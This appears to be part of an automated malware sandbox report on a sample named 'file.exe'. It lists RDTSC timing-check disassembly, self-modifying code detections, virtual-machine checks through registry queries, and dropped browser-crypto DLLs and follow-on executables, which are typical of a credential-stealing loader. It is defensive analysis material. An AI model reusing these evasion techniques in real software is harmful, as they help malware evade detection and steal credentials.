                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1101F63 second address: 1101FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop esi 0x0000000f jnc 00007FBBA93ED298h 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007FBBA93ED2A8h 0x0000001c push 00000000h 0x0000001e or dword ptr [ebp+124520C8h], edi 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+1244F634h] 0x0000002c xchg eax, esi 0x0000002d jmp 00007FBBA93ED29Ch 0x00000032 push eax 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1102EAB second address: 1102F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBBA8502AC0h 0x0000000f nop 0x00000010 mov edi, ebx 0x00000012 push 00000000h 0x00000014 add dword ptr [ebp+122D2AD0h], edi 0x0000001a mov bx, ax 0x0000001d push 00000000h 0x0000001f jmp 00007FBBA8502AC1h 0x00000024 pushad 0x00000025 jnc 00007FBBA8502ABCh 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBBA8502AC0h 0x00000036 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1102F1A second address: 1102F31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1102F31 second address: 1102F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBBA8502ABDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FBBA8502AB6h 0x00000018 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1102F51 second address: 1102F57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F6DEA second address: 10F6DF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F6DF1 second address: 10F6E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FBBA93ED298h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov bx, F2A0h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov edi, dword ptr [ebp+122D380Fh] 0x00000035 mov edi, 08663DB3h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007FBBA93ED298h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b mov dword ptr [ebp+122D3580h], edi 0x00000061 mov eax, dword ptr [ebp+122D05D5h] 0x00000067 mov di, ax 0x0000006a push FFFFFFFFh 0x0000006c or dword ptr [ebp+122D2FD0h], edi 0x00000072 nop 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FBBA93ED2A8h 0x0000007a rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F7C07 second address: 10F7C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F8C32 second address: 10F8C44 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10FAC24 second address: 10FAC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 110C56A second address: 110C594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBA93ED2A6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 110C594 second address: 110C5AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 110C87F second address: 110C89C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBBA93ED2A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 110C89C second address: 110C8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 110C8A0 second address: 110C8AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10FBE1D second address: 10FBE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10FDC67 second address: 10FDC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10FDC6B second address: 10FDC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1100011 second address: 1100015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1100015 second address: 110001B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1101012 second address: 1101018 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 11061A5 second address: 11061BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FBBA8502AB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FBBA8502AB6h 0x00000016 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10A0191 second address: 10A0195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10A0195 second address: 10A01AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC1h 0x0000000d rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1113523 second address: 111354A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA93ED298h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007FBBA93ED2A0h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 111354A second address: 111354E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 111354E second address: 1113554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 111361B second address: 1113629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 11191D5 second address: 11191DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 111863C second address: 1118640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1118640 second address: 111865B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBBA93ED29Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 11187AC second address: 11187B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBBA8502AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 111890C second address: 111893E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBBA93ED296h 0x00000008 jno 00007FBBA93ED296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jne 00007FBBA93ED296h 0x00000017 jmp 00007FBBA93ED2A9h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1118CE3 second address: 1118CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1118CE9 second address: 1118CFF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBBA93ED29Ch 0x0000000f rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1118CFF second address: 1118D23 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBBA8502AC6h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FBBA8502AB6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1118D23 second address: 1118D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1118D27 second address: 1118D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1118ECA second address: 1118EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007FBBA93ED296h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FBBA93ED2A9h 0x00000013 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 1119098 second address: 11190A4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA8502AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 11190A4 second address: 11190A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 11190A9 second address: 11190B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 11190B6 second address: 11190BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10A8704 second address: 10A870A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F13A0 second address: 10F13AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBBA93ED296h 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F19C0 second address: 10F19C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F19C6 second address: F3EA22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D38F3h] 0x00000010 push dword ptr [ebp+122D00E9h] 0x00000016 sub dword ptr [ebp+122D341Ch], esi 0x0000001c movzx edi, ax 0x0000001f call dword ptr [ebp+122D2AC5h] 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D2AD5h], esi 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f sub esi, dword ptr [ebp+122D365Bh] 0x00000035 push edx 0x00000036 pop edx 0x00000037 popad 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jmp 00007FBBA93ED2A9h 0x00000041 mov dword ptr [ebp+122D388Fh], eax 0x00000047 jns 00007FBBA93ED2ABh 0x0000004d jne 00007FBBA93ED29Ch 0x00000053 mov esi, 0000003Ch 0x00000058 jne 00007FBBA93ED297h 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jmp 00007FBBA93ED29Fh 0x00000067 lodsw 0x00000069 js 00007FBBA93ED29Ch 0x0000006f mov dword ptr [ebp+122D2A0Bh], edx 0x00000075 clc 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b movsx esi, dx 0x0000007e and bl, FFFFFFA5h 0x00000081 popad 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 sub dword ptr [ebp+122D2AD5h], edx 0x0000008c nop 0x0000008d pushad 0x0000008e push eax 0x0000008f push edx 0x00000090 jnp 00007FBBA93ED296h 0x00000096 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1AF0 second address: 10F1AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1B76 second address: 10F1B80 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBBA93ED29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1B80 second address: 10F1BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 cld 0x0000000a nop 0x0000000b jne 00007FBBA8502AC0h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1C3D second address: 10F1C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1C43 second address: 10F1C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FBBA8502AB6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1C4D second address: 10F1C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1CD8 second address: 10F1D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FBBA8502AC8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1D00 second address: 10F1D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1DBD second address: 10F1DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1DCA second address: 10F1DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1DE1 second address: 10F1DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBBA8502AB6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F1DEB second address: 10F1E46 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FBBA93ED298h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dl, 46h 0x00000029 add di, 5AC0h 0x0000002e sub edi, dword ptr [ebp+122D3807h] 0x00000034 push 00000004h 0x00000036 mov dword ptr [ebp+122D2AD0h], edi 0x0000003c jl 00007FBBA93ED29Ch 0x00000042 mov dword ptr [ebp+12475808h], ebx 0x00000048 nop 0x00000049 jp 00007FBBA93ED29Eh 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | RDTSC instruction interceptor: First address: 10F2204 second address: 10F2220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CEF870 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E9BDF5 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Special instruction interceptor: First address: F3E9AD instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Special instruction interceptor: First address: F3EAB0 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Special instruction interceptor: First address: 10E4459 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Special instruction interceptor: First address: F3E978 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Special instruction interceptor: First address: 116EC52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: 8EE9AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: 8EEAB0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: A94459 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: 8EE978 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: B1EC52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Special instruction interceptor: First address: D93A0B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Special instruction interceptor: First address: F3A4F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Special instruction interceptor: First address: F3A906 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Special instruction interceptor: First address: D91082 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Special instruction interceptor: First address: F40CE2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Special instruction interceptor: First address: FC2F9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Special instruction interceptor: First address: 824B1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Special instruction interceptor: First address: 9C2ADD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Special instruction interceptor: First address: 9EA6CC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Special instruction interceptor: First address: 9D444D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Special instruction interceptor: First address: EE7BA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Special instruction interceptor: First address: EE7CE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Special instruction interceptor: First address: 1090ABF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Special instruction interceptor: First address: EE53A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Special instruction interceptor: First address: 110FAE3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Special instruction interceptor: First address: AFF870 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Special instruction interceptor: First address: CABDF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_056B027E rdtsc 21_2_056B027E
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exe
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe | API coverage: 0.3 %
Source: C:\Users\user\Desktop\file.exe TID: 7368 | Thread sleep time: -30015s >= -30000s
